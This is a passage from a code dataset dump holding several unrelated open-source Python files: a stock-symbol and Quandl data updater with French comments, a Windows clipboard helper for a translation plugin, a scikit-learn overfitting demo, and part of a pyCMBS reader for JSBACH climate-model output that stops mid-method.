refSymbolNamesList = [refSymbol.symbol for refSymbol in referenceSymbolsList]
# Mappe les symbols de référence avec les symbols de chaque source
dbReferenceSymbolDAO.mapOneToOneRelationsSymbols(refSymbolNamesList, exchange)
self.logger.info("Référence - symbols mappés")
return
def _updateQuandlSymbols(self, exchangeNamesTuple):
'''
Updates the Quandl symbol tables in the database.
:param exchangeNamesTuple: tuple of exchange names
:type exchangeNamesTuple: tuple
'''
self.logger.info("Début de l'update des symbols Google")
self._updateGoogleSymbols(exchangeNamesTuple)
self.logger.info("Fin de l'update des symbols Google")
self.logger.info("Début de l'update des symbols Yahoo")
self._updateYahooSymbols(exchangeNamesTuple)
self.logger.info("Fin de l'update des symbols Yahoo")
self.logger.info("Début de l'update des symbols Wiki")
self._updateWikiSymbols(exchangeNamesTuple)
self.logger.info("Fin de l'update des symbols Wiki")
return
@retryLogger(maxRetryNbr=3, sleepTimeIncr=30)
def _updateGoogleSymbols(self, exchangeNamesTuple):
'''
Updates the Google symbol table in the database.
:param exchangeNamesTuple: tuple of exchange names
:type exchangeNamesTuple: tuple
'''
# Met en place les DAO des symbols
googleSymbolsDAO = GoogleSymbolsDA()
dbGoogleSymbolsDAO = DbGoogleSymbolsDA()
# Récupère tous les symbols de la source
symbolsListGoogle = googleSymbolsDAO.returnSymbolsDict()
# Crée la liste d'exchange effectifs de cette source
googleExchangeNamesList = []
for exchange in exchangeNamesTuple:
googleExchangeNamesList.append(self._returnEffectiveExchange(exchange)['Google'])
googleExchangeNamesList = list(set(googleExchangeNamesList))
# Ajoute les symbols à la DB pour chaque exchange du tuple
for exchange in googleExchangeNamesList:
self.logger.info("Google - traitement des symbols de " + str(exchange))
# Récupère la liste de symbols de cet exchange
currentSymbolsList = symbolsListGoogle[exchange][0:DbManager.limitNbr]
# Les ajoute en DB
dbGoogleSymbolsDAO.updateOrAddSymbolsList(currentSymbolsList, exchange)
return
@retryLogger(maxRetryNbr=3, sleepTimeIncr=30)
def _updateYahooSymbols(self, exchangeNamesTuple):
'''
Updates the Yahoo symbol table in the database.
:param exchangeNamesTuple: tuple of exchange names
:type exchangeNamesTuple: tuple
'''
# Met en place les DAO des symbols
yahooSymbolsDAO = YahooSymbolsDA()
dbYahooSymbolsDAO = DbYahooSymbolsDA()
# Récupère tous les symbols de la source
symbolsListYahoo = yahooSymbolsDAO.returnSymbolsDict()
# Crée la liste d'exchange effectifs de cette source
yahooExchangeNamesList = []
for exchange in exchangeNamesTuple:
yahooExchangeNamesList.append(self._returnEffectiveExchange(exchange)['Yahoo'])
yahooExchangeNamesList = list(set(yahooExchangeNamesList))
# Ajoute les symbols à la DB pour chaque exchange du tuple
for exchange in yahooExchangeNamesList:
self.logger.info("Yahoo - traitement des symbols de " + str(exchange))
# Récupère la liste de symbols de cet exchange
currentSymbolsList = symbolsListYahoo[exchange][0:DbManager.limitNbr]
# Les ajoute en DB
dbYahooSymbolsDAO.updateOrAddSymbolsList(currentSymbolsList, exchange)
return
@retryLogger(maxRetryNbr=3, sleepTimeIncr=30)
def _updateWikiSymbols(self, exchangeNamesTuple):
'''
Updates the Wiki symbol table in the database.
:param exchangeNamesTuple: tuple of exchange names
:type exchangeNamesTuple: tuple
'''
# Met en place les DAO des symbols
wikiSymbolsDAO = WikiSymbolsDA()
dbWikiSymbolsDAO = DbWikiSymbolsDA()
# Récupère tous les symbols de la source
symbolsListWiki = wikiSymbolsDAO.returnSymbolsDict()
# Crée la liste d'exchange effectifs de cette source
wikiExchangeNamesList = []
for exchange in exchangeNamesTuple:
wikiExchangeNamesList.append(self._returnEffectiveExchange(exchange)['Wiki'])
wikiExchangeNamesList = list(set(wikiExchangeNamesList))
# Ajoute les symbols à la DB pour chaque exchange du tuple
for exchange in wikiExchangeNamesList:
self.logger.info("Wiki - traitement des symbols de " + str(exchange))
# Récupère la liste de symbols de cet exchange
currentSymbolsList = symbolsListWiki[exchange][0:DbManager.limitNbr]
# Les ajoute en DB
dbWikiSymbolsDAO.updateOrAddSymbolsList(currentSymbolsList, exchange)
return
# -------------- Méthodes d'update des raw data ---------------------
def _updateQuandlRawData(self, exchange):
'''
Updates the Quandl data tables in the database.
:param exchange: name of the exchange
:type exchange: str
'''
# Ces liste stockent les objets Db des symbols
googleSymbolsList = []
yahooSymbolsList = []
wikiSymbolsList = []
# Récupère les DAO
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
# Parcourt la liste des symbols de référence
for refSymbol in dbReferenceSymbolDAO.getAllSymbolsList(exchange):
# Récupère pour chaque symbol de référence le symbol de chaque source
# et l'append à sa liste s'il existe
if refSymbol.googleSymbol is not None:
googleSymbolsList.append(refSymbol.googleSymbol)
if refSymbol.yahooSymbol is not None:
yahooSymbolsList.append(refSymbol.yahooSymbol)
if refSymbol.wikiSymbol is not None:
wikiSymbolsList.append(refSymbol.wikiSymbol)
self.logger.info("Liste de symbols (Google, Yahoo, Wiki) assemblées")
self.logger.info("Début de la maj des raw data (Google, Yahoo Wiki) (threading)")
# Crée un thread par source et execute la fonction de maj
googleThread = ThreadUpdateRawData(self._updateGoogleRawData, googleSymbolsList, exchange)
yahooThread = ThreadUpdateRawData(self._updateYahooRawData, yahooSymbolsList, exchange)
wikiThread = ThreadUpdateRawData(self._updateWikiRawData, wikiSymbolsList, exchange)
googleThread.start()
yahooThread.start()
wikiThread.start()
# Il faut les join avant de quitter cette fonction pour s'assurer que tout le monde est là
googleThread.join()
yahooThread.join()
wikiThread.join()
self.logger.info("Google - fin de la maj des raw data")
self.logger.info("Yahoo - fin de la maj des raw data")
self.logger.info("Wiki - fin de la maj des raw data")
self.logger.info("Fin de la maj des raw data (Google, Yahoo Wiki) (threading)")
return
def _updateReferenceRawData(self, exchange):
'''
Updates the reference (aggregated) data table in the database.
:param exchange: name of the exchange
:type exchange: str
'''
# Récupère les DAO
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
# Cette liste stocke les objets Db des symbols
refSymbolsList = []
self.logger.info("Début de la maj des raw data de reference (threading)")
# Construit la liste des symbols de référence à traiter
# Elle est construite après la maj des autres symbols car sinon
# les symbols de référence récupérés ne seront pas à jour.
for refSymbol in dbReferenceSymbolDAO.getAllSymbolsList(exchange):
if refSymbol.googleSymbol is not None or refSymbol.yahooSymbol is not None \
or refSymbol.wikiSymbol is not None :
refSymbolsList.append(refSymbol)
# Traite les reference raw data en les mettant dans un thread
# Ici le thread ne sert à rien sauf pour profiter de sa fonction de chunk
referenceThread = ThreadUpdateRawData(self._updateReferenceRawDataLists, refSymbolsList, exchange)
referenceThread.start()
referenceThread.join()
self.logger.info("Référence - fin de la maj des raw data")
return
def _updateGoogleRawData(self, dbSymbolsList, exchange):
'''
Updates the Google data table in the database.
:param dbSymbolsList: list of Google symbol objects
:param dbSymbolsList: list
:param exchange: name of the exchange
:type exchange: str
'''
self.logger.info("Google - début de la maj des raw data")
# Liste des objets raw data à update
toUpdateRawDataList = []
toMapSymbolNamesList = []
# Liste de symbols à problème
issuesSymbolsList = []
# Récupère les DAO
googleRawDataDAO = GoogleRawDataDA()
dbGoogleRawDataDAO = DbGoogleRawDataDA()
dbGoogleSymbolsDAO = DbGoogleSymbolsDA()
# Pour chaque symbol
for dbSymbol in dbSymbolsList:
self.logger.debug("GOOGLE : " + str(exchange) + "-" + dbSymbol.symbol.upper())
# Nom du symbol à demander chez Quandl
googleSymbolName = "_".join([dbSymbol.exchange.upper(), dbSymbol.symbol.upper()])
# Appelle la fonction de récupération des data
returnValue = self._returnQuandlRawDataDictAndNew(dbSymbol,
googleSymbolName,
googleRawDataDAO)
# Dans ce cas la data n'a pas été récupérée correctement.
# Tout a été loggé on peut passer au symbol d'après.
if returnValue is None:
issuesSymbolsList.append({'Symbol' : dbSymbol.symbol.upper(),
'Exchange' : dbSymbol.exchange.upper()})
continue
(isNew, rawDataDict) = returnValue
# Met ces données dans la liste de données à maj
toUpdateRawDataList.append(rawDataDict)
if isNew:
# Met le symbol dans la liste des symbols à mapper
toMapSymbolNamesList.append(dbSymbol.symbol.upper())
# Effectue toutes les maj en DB
dbGoogleRawDataDAO.updateOrAddRawDataList(toUpdateRawDataList, exchange)
# Effectue le mapping
dbGoogleSymbolsDAO.mapOneToOneRelations(toMapSymbolNamesList, exchange)
self.logger.warning("Google - symbols à problèmes : " + str(issuesSymbolsList))
return
def _updateYahooRawData(self, dbSymbolsList, exchange):
'''
Updates the Yahoo data table in the database.
:param dbSymbolsList: list of Yahoo symbol objects
:param dbSymbolsList: list
:param exchange: name of the exchange
:type exchange: str
'''
self.logger.info("Yahoo - début de la maj des raw data")
# Liste des objets raw data à update
toUpdateRawDataList = []
toMapSymbolNamesList = []
# Liste de symbols à problème
issuesSymbolsList = []
# Récupère les DAO
yahooRawDataDAO = YahooRawDataDA()
dbYahooRawDataDAO = DbYahooRawDataDA()
dbYahooSymbolsDAO = DbYahooSymbolsDA()
exchange = self._returnEffectiveExchange(exchange)['Yahoo']
# Pour chaque symbol
for dbSymbol in dbSymbolsList:
self.logger.debug("YAHOO : " + str(exchange) + "-" + dbSymbol.symbol.upper())
# Nom du symbol à demander chez Quandl
yahooSymbolName = dbSymbol.symbol.upper()
# Appelle la fonction de récupération des data
returnValue = self._returnQuandlRawDataDictAndNew(dbSymbol,
yahooSymbolName,
yahooRawDataDAO)
# Dans ce cas la data n'a pas été récupérée correctement.
# Tout a été loggé on peut passer au symbol d'après.
if returnValue is None:
issuesSymbolsList.append({'Symbol' : dbSymbol.symbol.upper(),
'Exchange' : dbSymbol.exchange.upper()})
continue
(isNew, rawDataDict) = returnValue
# Met ces données dans la liste de données à maj
toUpdateRawDataList.append(rawDataDict)
if isNew:
# Met le symbol dans la liste des symbols à mapper
toMapSymbolNamesList.append(dbSymbol.symbol.upper())
# Effectue toutes les maj en DB
dbYahooRawDataDAO.updateOrAddRawDataList(toUpdateRawDataList, exchange)
# Effectue le mapping
dbYahooSymbolsDAO.mapOneToOneRelations(toMapSymbolNamesList, exchange)
self.logger.warning("Yahoo - symbols à problèmes : " + str(issuesSymbolsList))
return
def _updateWikiRawData(self, dbSymbolsList, exchange):
'''
Updates the Wiki data table in the database.
:param dbSymbolsList: list of Wiki symbol objects
:param dbSymbolsList: list
:param exchange: name of the exchange
:type exchange: str
'''
self.logger.info("Wiki - début de la maj des raw data")
# Liste des objets raw data à update
toUpdateRawDataList = []
toMapSymbolNamesList = []
# Liste de symbols à problème
issuesSymbolsList = []
# Récupère les DAO
wikiRawDataDAO = WikiRawDataDA()
dbWikiRawDataDAO = DbWikiRawDataDA()
dbWikiSymbolsDAO = DbWikiSymbolsDA()
exchange = self._returnEffectiveExchange(exchange)['Wiki']
# Pour chaque symbol
for dbSymbol in dbSymbolsList:
self.logger.debug("WIKI : " + str(exchange) + "-" + dbSymbol.symbol.upper())
# Nom du symbol à demander chez Quandl
wikiSymbolName = dbSymbol.symbol.upper()
# Appelle la fonction de récupération des data
returnValue = self._returnQuandlRawDataDictAndNew(dbSymbol,
wikiSymbolName,
wikiRawDataDAO)
# Dans ce cas la data n'a pas été récupérée correctement.
# Tout a été loggé on peut passer au symbol d'après.
if returnValue is None:
issuesSymbolsList.append({'Symbol' : dbSymbol.symbol.upper(),
'Exchange' : dbSymbol.exchange.upper()})
continue
(isNew, rawDataDict) = returnValue
# Met ces données dans la liste de données à maj
toUpdateRawDataList.append(rawDataDict)
if isNew:
# Met le symbol dans la liste des symbols à mapper
toMapSymbolNamesList.append(dbSymbol.symbol.upper())
# Effectue toutes les maj en DB
dbWikiRawDataDAO.updateOrAddRawDataList(toUpdateRawDataList, exchange)
# Effectue le mapping
dbWikiSymbolsDAO.mapOneToOneRelations(toMapSymbolNamesList, exchange)
self.logger.warning("Wiki - symbols à problèmes : " + str(issuesSymbolsList))
return
@retryLogger(maxRetryNbr=3, sleepTimeIncr=10)
def _returnQuandlRawDataDictAndNew(self, dbSymbol, quandlSymbolName, rawDataDAO):
'''
Returns the rawData dict of the symbol fetched from Quandl. Indicates
also if the rawData is new to the database (1st time fetched).
:param dbSymbol: symbol object
:type dbSymbol: BaseSymbol
:param quandlSymbolName: name of the symbol to fetch from Quandl
:type quandlSymbolName: str
:param rawDataDAO: data access object to the Quandl database
:type rawDataDAO: QuandlRawDataDA
:returns: tuple with the raw data dict and a boolean indicating if the
data is new to the local database.
:rtype: tuple
'''
# Booléen pour savoir la data est nouvelle ou non
isNew = False
# Récupère les meta data
metaData = rawDataDAO.returnMetaData(quandlSymbolName)
# Initialisation du data frame (si on fait 2 updates sans update du côté
# de quandl il sera à None car aucune nouvelle date ne sera récupérée).
dataFrame = None
# Si le raw data du symbol n'existe pas
if dbSymbol.rawData is None:
# Récupère l'ensemble des données
dataFrame = rawDataDAO.returnDataFrame(quandlSymbolName,
metaData['oldest_available_date'],
metaData['newest_available_date'])
# Il s'agit d'une nouvelle data
isNew = True
else:
# Récupère les données
if metaData['oldest_available_date'] < dbSymbol.rawData.oldestDateAvailable:
# Effectue un maj complète
dataFrame = rawDataDAO.returnDataFrame(quandlSymbolName,
metaData['oldest_available_date'],
metaData['newest_available_date'])
elif dbSymbol.rawData.newestDateAvailable < metaData['newest_available_date']:
# Ne récupère que le bout qui manque
dataFrame = rawDataDAO.returnDataFrame(quandlSymbolName,
dbSymbol.rawData.newestDateAvailable ,
metaData['newest_available_date'])
# Forme le dict du symbol et des raw data
rawDataDict = {'symbol' : dbSymbol.symbol.upper(),
'metaData': metaData,
'dataFrame' : dataFrame}
return (isNew, rawDataDict)
def _updateReferenceRawDataLists(self, dbSymbolsList, exchange):
'''
Updates the reference (aggregated) data table in the database.
:param dbSymbolsList: list of reference symbol objects
:param dbSymbolsList: list
:param exchange: name of the exchange
:type exchange: str
'''
self.logger.info("Référence - début de la maj des raw data")
# Liste des objets raw data à update
toUpdateRawDataList = []
toMapSymbolNamesList = []
# Liste de symbols à problème
issuesSymbolsList = []
# Récupère les DAO des symbols de référence
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
referenceRawDataDAO = ReferenceRawDataDA()
dbReferenceRawDataDAO = DbReferenceRawDataDA()
# Parcourt la liste des symbols de référence
for refSymbol in dbSymbolsList:
self.logger.debug("REFERENCE : " + str(exchange) + "-" + refSymbol.symbol.upper())
try:
# Récupère les meta data
metaData = referenceRawDataDAO.returnMetaData(refSymbol)
# Initilise le dataFrame
dataFrame = None
# Initialise le raw data du symbol s'il n'existe pas
if refSymbol.rawData is None:
# Récupère l'ensemble des données
dataFrame = referenceRawDataDAO.returnDataFrame(refSymbol,
metaData['oldest_available_date'],
metaData['newest_available_date'])
# Met le symbol dans la liste des symbols à mapper
toMapSymbolNamesList.append(refSymbol.symbol.upper())
else:
# Récupère les données
if metaData['oldest_available_date'] < refSymbol.rawData.oldestDateAvailable:
# Effectue un maj complète
dataFrame = referenceRawDataDAO.returnDataFrame(refSymbol,
metaData['oldest_available_date'],
metaData['newest_available_date'])
elif refSymbol.rawData.sourceNewestConsolidatedDate < metaData['newest_available_date']:
# Ne récupère que le bout qui manque
dataFrame = referenceRawDataDAO.returnDataFrame(refSymbol,
refSymbol.rawData.sourceNewestConsolidatedDate ,
metaData['newest_available_date'])
# Met ces données dans la liste de données à maj
rawDataDict = {'symbol' : refSymbol.symbol.upper(),
'metaData': metaData,
'dataFrame' : dataFrame}
toUpdateRawDataList.append(rawDataDict)
except Exception as e:
# Dans ce cas il y a eu un problème avec ce symbol,
# on l'ajoute à la liste des symbols à problème
self.logger.error('Erreur', exc_info=True)
issuesSymbolsList.append({'Symbol' : refSymbol.symbol.upper(),
'Exchange' : refSymbol.exchange.upper()})
# Effectue la maj de la db
dbReferenceRawDataDAO.updateOrAddRawDataList(toUpdateRawDataList, exchange)
# Effectuer le mapping
dbReferenceSymbolDAO.mapOneToOneRelationsRawData(toMapSymbolNamesList, exchange)
self.logger.warning("Référence - symbols à problèmes : " + str(issuesSymbolsList))
return
# ---------------- Méthodes utilitaires -----------------------
def _returnEffectiveExchange(self, exchange):
'''
Returns a dcit with the effective exchange name for each source.
:param exchange: name of the exchange
:type exchange: str
:returns: dict of effective name ordered by source
:rtype: dict
.. note::
Dict attribute access:
>>> exchangeDict['Google']
>>> exchangeDict['Yahoo']
>>> exchangeDict['Wiki']
'''
exchangeDict = {}
exchangeDict['Google'] = exchange.upper()
if exchange.upper() in ('NYSE', 'NASDAQ'):
exchangeDict['Yahoo'] = 'OTHER'
exchangeDict['Wiki'] = 'OTHER'
return exchangeDict
| aberdah/Stockvider | stockvider/stockviderApp/dbManager.py | Python | mit | 33,602 |
# -*- coding: utf-8 -*-
import wx
import win32clipboard
import win32con
import gui
import treeInterceptorHandler
import textInfos
import globalVars
def getSelectedText():
obj = globalVars.focusObject
if isinstance(obj.treeInterceptor, treeInterceptorHandler.DocumentTreeInterceptor) and not obj.treeInterceptor.passThrough:
obj = obj.treeInterceptor
try:
info = obj.makeTextInfo(textInfos.POSITION_SELECTION)
except (RuntimeError, NotImplementedError):
info = None
if not info or info.isCollapsed:
return None
return info.text
def getClipboardText():
try:
win32clipboard.OpenClipboard()
except win32clipboard.error:
return None
try:
text = win32clipboard.GetClipboardData(win32con.CF_UNICODETEXT)
except:
text = None
finally:
win32clipboard.CloseClipboard()
return text
def setClipboardText(text):
if not isinstance(text, unicode) or len(text)==0 or text.isspace():
return False
try:
win32clipboard.OpenClipboard()
except win32clipboard.error:
return False
try:
win32clipboard.EmptyClipboard()
win32clipboard.SetClipboardData(win32con.CF_UNICODETEXT, text)
success = True
except:
success = False
win32clipboard.CloseClipboard()
return success
class TextWindow(wx.Frame):
def __init__(self, text, title, readOnly=True):
super(TextWindow, self).__init__(gui.mainFrame, title=title)
sizer = wx.BoxSizer(wx.VERTICAL)
style = wx.TE_MULTILINE | wx.TE_RICH
if readOnly:
style |= wx.TE_READONLY
self.outputCtrl = wx.TextCtrl(self, style=style)
self.outputCtrl.Bind(wx.EVT_KEY_DOWN, self.onOutputKeyDown)
sizer.Add(self.outputCtrl, proportion=1, flag=wx.EXPAND)
self.SetSizer(sizer)
sizer.Fit(self)
self.outputCtrl.SetValue(text)
self.outputCtrl.SetFocus()
self.Raise()
self.Maximize()
self.Show()
def onOutputKeyDown(self, event):
if event.GetKeyCode() == wx.WXK_ESCAPE:
self.Close()
event.Skip()
| kvark128/yandexTranslate | globalPlugins/yandexTranslate/helper.py | Python | mit | 1,890 |
import numpy as np
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
np.random.seed(0)
n_samples = 30
degrees = [1, 4, 15]
true_fun = lambda X: np.cos(1.5 * np.pi * X)
X = np.sort(np.random.rand(n_samples))
y = true_fun(X) + np.random.randn(n_samples) * 0.1
plot_titles = ['Underfit', 'Just right', 'Overfit']
plt.figure(figsize=(14, 5))
for i in range(len(degrees)):
ax = plt.subplot(1, len(degrees), i + 1)
plt.setp(ax, xticks=(), yticks=())
polynomial_features = PolynomialFeatures(degree=degrees[i],
include_bias=False)
linear_regression = LinearRegression()
pipeline = Pipeline([("polynomial_features", polynomial_features),
("linear_regression", linear_regression)])
pipeline.fit(X[:, np.newaxis], y)
# Evaluate the models using crossvalidation
scores = cross_val_score(pipeline, X[:, np.newaxis], y,
scoring="neg_mean_squared_error", cv=10)
X_test = np.linspace(0, 1, 100)
plt.plot(X_test, pipeline.predict(X_test[:, np.newaxis]), label="Model")
#plt.plot(X_test, true_fun(X_test), label="True function")
plt.scatter(X, y, c='k', label="Samples")
plt.xlabel("x with degree: {}".format(degrees[i]))
plt.ylabel("y")
plt.xlim((0, 1))
plt.ylim((-2, 2))
plt.legend(loc="best")
plt.title(plot_titles[i])
#plt.show()
plt.savefig('images/overfit_underfit.png') | bhzunami/Immo | immo/scikit/scripts/Overfit_underfit.py | Python | mit | 1,611 |
# -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
from cdo import Cdo
from pycmbs.data import Data
import tempfile as tempfile
import copy
import glob
import os
import sys
import numpy as np
from pycmbs.benchmarking import preprocessor
from pycmbs.benchmarking.utils import get_T63_landseamask, get_temporary_directory
from pycmbs.benchmarking.models.model_basic import *
class JSBACH_BOT(Model):
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, **kwargs):
super(JSBACH_BOT, self).__init__(filename, dic_variables, name=name, **kwargs)
self.experiment = experiment
self.shift_lon = shift_lon
self.type = 'JSBACH_BOT'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
@return: string with unique combination of models and experiment
"""
return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
def get_albedo_data(self, interval='season'):
"""
get albedo data for JSBACH
returns Data object
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
v = 'var176'
filename = self.data_dir + 'data/model1/' + self.experiment + '_echam6_BOT_mm_1979-2006_albedo_yseasmean.nc'
ls_mask = get_T63_landseamask(self.shift_lon)
albedo = Data(filename, v, read=True,
label='MPI-ESM albedo ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data)
return albedo
def get_tree_fraction(self, interval='season'):
"""
todo implement this for data from a real run !!!
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
ls_mask = get_T63_landseamask(self.shift_lon)
filename = '/home/m300028/shared/dev/svn/trstools-0.0.1/lib/python/pyCMBS/framework/external/vegetation_benchmarking/VEGETATION_COVER_BENCHMARKING/example/historical_r1i1p1-LR_1850-2005_forest_shrub.nc'
v = 'var12'
tree = Data(filename, v, read=True,
label='MPI-ESM tree fraction ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data, start_time=pl.num2date(pl.datestr2num('2001-01-01')), stop_time=pl.num2date(pl.datestr2num('2001-12-31')))
return tree
def get_grass_fraction(self, interval='season'):
"""
todo implement this for data from a real run !!!
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
ls_mask = get_T63_landseamask(self.shift_lon)
filename = '/home/m300028/shared/dev/svn/trstools-0.0.1/lib/python/pyCMBS/framework/external/vegetation_benchmarking/VEGETATION_COVER_BENCHMARKING/example/historical_r1i1p1-LR_1850-2005_grass_crop_pasture_2001.nc'
v = 'var12'
grass = Data(filename, v, read=True,
label='MPI-ESM tree fraction ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
#shift_lon=shift_lon,
mask=ls_mask.data.data, start_time=pl.num2date(pl.datestr2num('2001-01-01')), stop_time=pl.num2date(pl.datestr2num('2001-12-31')), squeeze=True)
return grass
def get_surface_shortwave_radiation_down(self, interval='season'):
"""
get surface shortwave incoming radiation data for JSBACH
returns Data object
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
v = 'var176'
y1 = '1979-01-01'
y2 = '2006-12-31'
rawfilename = self.data_dir + 'data/model/' + self.experiment + '_echam6_BOT_mm_1979-2006_srads.nc'
if not os.path.exists(rawfilename):
return None
#--- read data
cdo = pyCDO(rawfilename, y1, y2)
if interval == 'season':
seasfile = cdo.seasmean()
del cdo
print 'seasfile: ', seasfile
cdo = pyCDO(seasfile, y1, y2)
filename = cdo.yseasmean()
else:
raise ValueError('Invalid interval option %s ' % interval)
#--- read land-sea mask
ls_mask = get_T63_landseamask(self.shift_lon)
#--- read SIS data
sis = Data(filename, v, read=True,
label='MPI-ESM SIS ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
#shift_lon=shift_lon,
mask=ls_mask.data.data)
return sis
def get_rainfall_data(self, interval='season'):
"""
get rainfall data for JSBACH
returns Data object
"""
if interval == 'season':
pass
else:
raise ValueError('Invalid value for interval: %s' % interval)
#/// PREPROCESSING: seasonal means ///
s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
filename1 = self.data_dir + self.experiment + '_echam6_BOT_mm_1980_sel.nc'
tmp = pyCDO(filename1, s_start_time, s_stop_time).seldate()
tmp1 = pyCDO(tmp, s_start_time, s_stop_time).seasmean()
filename = pyCDO(tmp1, s_start_time, s_stop_time).yseasmean()
#/// READ DATA ///
#1) land / sea mask
ls_mask = get_T63_landseamask(self.shift_lon)
#2) precipitation data
try:
v = 'var4'
rain = Data(filename, v, read=True, scale_factor=86400.,
label='MPI-ESM ' + self.experiment, unit='mm/day', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data)
except:
v = 'var142'
rain = Data(filename, v, read=True, scale_factor=86400.,
label='MPI-ESM ' + self.experiment, unit='mm/day', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data)
return rain
class JSBACH_RAW2(Model):
"""
Class for RAW JSBACH model output
works on the real raw output
"""
#def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, model_dict=None, input_format='grb', raw_outdata='outdata/jsbach/', **kwargs):
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, input_format='grb', raw_outdata='outdata/jsbach/', **kwargs):
"""
The assignment of certain variables to different input streams is done in the routine
get_jsbach_data_generic()
Parameters
----------
input_format : str
specifies file format of input data
['nc','grb']
"""
super(JSBACH_RAW2, self).__init__(filename, dic_variables, name=name, **kwargs)
self.experiment = experiment
self.shift_lon = shift_lon
#self.get_data()
self.type = 'JSBACH_RAW2'
self.input_format = input_format
assert self.input_format in ['nc', 'grb']
self.raw_outdata = raw_outdata
self._unique_name = self._get_unique_name()
# do preprocessing of streams (only needed once!) ---
self.files = {}
self._preproc_streams()
#~ self.model_dict = copy.deepcopy(model_dict)
self.model = 'JSBACH'
def _get_filenames_jsbach_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_main_mm_*.' + self.input_format
def _get_filenames_veg_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_veg_mm_*.' + self.input_format
def _get_filenames_land_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_land_mm_*.' + self.input_format
def _get_filenames_surf_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_surf_mm_*.' + self.input_format
def _get_filenames_albedo_VIS(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_mm_*_VIS_albedo.' + self.input_format
def _get_filenames_albedo_NIR(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_mm_*_NIR_albedo.' + self.input_format
def _get_filenames_echam_BOT(self):
return self.data_dir + self.raw_outdata + '../echam6/' + self.experiment + '_echam6_BOT_mm_*.sz'
def _preproc_streams(self):
"""
It is assumed that the standard JSBACH postprocessing scripts have been applied.
Thus monthly mean data is available for each stream and code tables still need to be applied.
This routine does the following:
1) merge all times from individual (monthly mean) output files
2) assign codetables to work with proper variable names
3) aggregate data from tiles to gridbox values
"""
print 'Preprocessing JSBACH raw data streams (may take a while) ...'
cdo = Cdo()
# jsbach stream
print ' JSBACH stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_', dir=get_temporary_directory()) # temporary file
#~ print self.data_dir
#~ print self.raw_outdata
#~ print 'Files: ', self._get_filenames_jsbach_stream()
#~ stop
if len(glob.glob(self._get_filenames_jsbach_stream())) > 0: # check if input files existing at all
print 'Mering the following files:', self._get_filenames_jsbach_stream()
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_jsbach_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
print 'Outfile: ', outfile
#~ os.remove(tmp)
print 'Temporary name: ', tmp
self.files.update({'jsbach': outfile})
# veg stream
print ' VEG stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_veg_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_veg.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_veg_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_veg_stream())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_veg_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'veg': outfile})
# veg land
print ' LAND stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_land_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_land.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_land_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_land_stream())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_land_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'land': outfile})
# surf stream
print ' SURF stream ...'
